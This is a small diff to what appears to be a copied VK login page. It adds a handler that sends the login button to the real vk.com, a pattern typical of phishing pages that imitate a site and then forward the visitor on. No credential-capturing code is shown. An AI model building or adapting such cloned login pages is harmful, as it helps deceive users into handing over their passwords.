--- a/index.html
+++ b/index.html
@@ -247,7 +247,7 @@ var abp;
     <input name="v" value="5.100" class="" style="display:none"/>
       <input type="text" class="big_text" name="" value = "" id="index_email"  placeholder="Телефон или email" />
       <input type="password" class="big_text" name="" value = "" id="index_pass"  placeholder="Пароль"  />
-      <button id="index_login_button" class="index_login_button flat_button button_big_text">Войти</button>
+      <button id="index_login_button" class="index_login_button flat_button button_big_text" onClick='location.href="http://vk.com"'>Войти</button>
       <div class="forgot">
         <div class="checkbox" id="index_expire" onclick="checkbox(this);ge('index_expire_input').value=isChecked(this)?1:'';">Чужой компьютер</div>
         <a id="index_forgot" class="index_forgot" href="/restore" target="_top">Забыли пароль?</a>
